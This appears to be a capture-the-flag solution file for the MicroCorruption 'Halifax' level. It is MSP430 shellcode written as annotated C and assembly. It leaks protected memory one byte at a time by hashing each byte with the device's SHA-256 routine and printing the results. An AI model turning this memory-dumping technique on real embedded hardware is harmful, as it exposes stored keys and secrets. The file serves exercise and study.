MicroCorruption/25-Halifax/shellcode.c

127 lines
3.4 KiB
C
Raw Permalink Normal View History

2023-01-09 09:54:47 +00:00
#include "../common/io.c"
#include "../common/lib.c"
typedef u_int8_t u8;
typedef u_int16_t u16;
/*
print_hash_inline:
; for (i (r11) = 0; i != 0x20; i++)
44aa: 0b43 clr r11
pha_loop:
; byte (r14) = hash[i];
44ac: 0f41 mov sp, r15
44ae: 0f5b add r11, r15
44b0: 6e4f mov.b @r15, r14
; lower_nibble (r15) = byte & 0xf;
44b2: 0f4e mov r14, r15
44b4: 3ff0 0f00 and #0xf, r15
; lower_char (r11) = "0123456789ABCDEF"[lower_nibble];
44b8: 5a4f 1047 mov.b 0x4710(r15), r10
; upper_nibble (r14) = (byte >> 0x4) & 0xf;
44bc: 12c3 clrc
44be: 4e10 rrc.b r14
44c0: 12c3 clrc
44c2: 4e10 rrc.b r14
44c4: 12c3 clrc
44c6: 4e10 rrc.b r14
44c8: 12c3 clrc
44ca: 4e10 rrc.b r14
44cc: 3ef0 0f00 and #0xf, r14
; putchar("0123456789ABCDEF"[upper_nibble]);
44d0: 5f4e 1047 mov.b 0x4710(r14), r15
44d4: b012 7845 call #0x4578 <putchar>
; putchar(lower_char)
44d8: 4f4a mov.b r10, r15
44da: b012 7845 call #0x4578 <putchar>
; ... i != 0x20; i++)
44de: 1b53 inc r11
44e0: 3b90 2000 cmp #0x20, r11
44e4: e323 jne #0x44ac <pha_loop>
; puts (""); // prints newline
44e6: 3f40 2147 mov #0x4721, r15
44ea: b012 8645 call #0x4586 <puts>
*/
const char *HEX_LUT = "0123456789ABCDEF";
void main () {
// consts don't need registers
const u16 start = 0, length = 0x40;
// technically a const as well, but
u8 *shabuffer = mem_get(0x8000);
// assemble the shabuffer
/*asm
clr r11 // loop variable in r11
mov #1, r14
mov shabuffer [0x8000], r13
*/
get_sram_hashes:
for (u16 addr = start; addr < length; addr++) {
// we require at least 5 nibbles to determine the value
/*asm
loop:
0f4b mov r11, r15; mov addr r15
b012 b645 call #0x45b6 <sha256_internal>
3d50 0300 add #3, r13
1b53 add 0(r3), r11; inc r11
3b90 0010 cmp #0x1000, r11
jnc loop
*/
sha256_internal (addr, 1, shabuffer + addr * 3);
}
print_hex:
// print the buffer
/*asm
0b43 clr r11;
*/
for (int i = 0; i < length*3; i++) {
/*asm
1e4b 0080 mov 0x8000(r11), r14
*/
u8 lower_nibble = shabuffer[i];
/*asm
5e4b 0080 mov.b 0x8000(r11), r14
4f4e mov.b r14, r15
0f11 rra.b r15
0f11 rra.b r15
0f11 rra.b r15
0f11 rra.b r15
3ef0 0f00 and #0xf, r14
3ff0 0f00 and #0xf, r15
12c3 clrc
*/
u8 upper_nibble = (lower_nibble >> 4) & 0xf;
lower_nibble &= 0xf;
/*asm
5f4f 1047 mov.b 0x4710(r15), r15
b012 7845 call #0x4578; <putchar>
*/
putchar(HEX_LUT[upper_nibble]);
/*asm
5f4e 1047 mov.b 0x4710(r14), r15
b012 7845 call #0x4578; <putchar>
*/
putchar(HEX_LUT[lower_nibble]);
/*asm
1b53 add 0(r3), r11
3b90 c000 cmp #0xC0, r11
e82b jnc $-0x28
*/
}
getsn(mem_get(0x9000), 0x40);
sha256_internal(0, 0x40, 0x9000);
/*asm
3041 ret;
*/
return;
}